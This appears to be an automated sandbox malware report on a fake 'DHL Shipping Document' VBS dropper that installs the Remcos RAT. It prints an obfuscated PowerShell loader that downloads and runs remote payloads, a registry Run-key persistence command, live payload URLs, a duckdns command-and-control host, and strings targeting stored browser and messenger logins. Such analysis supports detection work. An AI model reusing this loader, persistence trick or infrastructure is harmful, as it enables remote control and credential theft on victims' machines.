              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 6924, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gstes
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opd

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22B210F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22B26580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,19_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses dynamic DNS services
              Source: unknownDNS query: name: janbours92harbu02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.9:60919 -> 206.123.148.194:3981
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 206.123.148.194 206.123.148.194
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: bhvB999.tmp.19.drString found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhvB999.tmp.19.drString found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: contemega.com.do
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contemega.com.do
              Source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhvB999.tmp.19.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvB999.tmp.19.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvB999.tmp.19.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvB999.tmp.19.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: bhvB999.tmp.19.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvB999.tmp.19.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: bhvB999.tmp.19.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.Pb)m
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.c
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.co
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/N
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Ne
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Ned
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Neds
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedsl
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedsla
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslag
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagn
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagni
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnin
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagning
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.dw
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/Nedslagnings.dwp
              Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/zPwwF47.bin
              Source: wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhvB999.tmp.19.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvB999.tmp.19.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvB999.tmp.19.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
              Source: bhvB999.tmp.19.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
              Source: bhvB999.tmp.19.drString found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
              Source: bhvB999.tmp.19.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
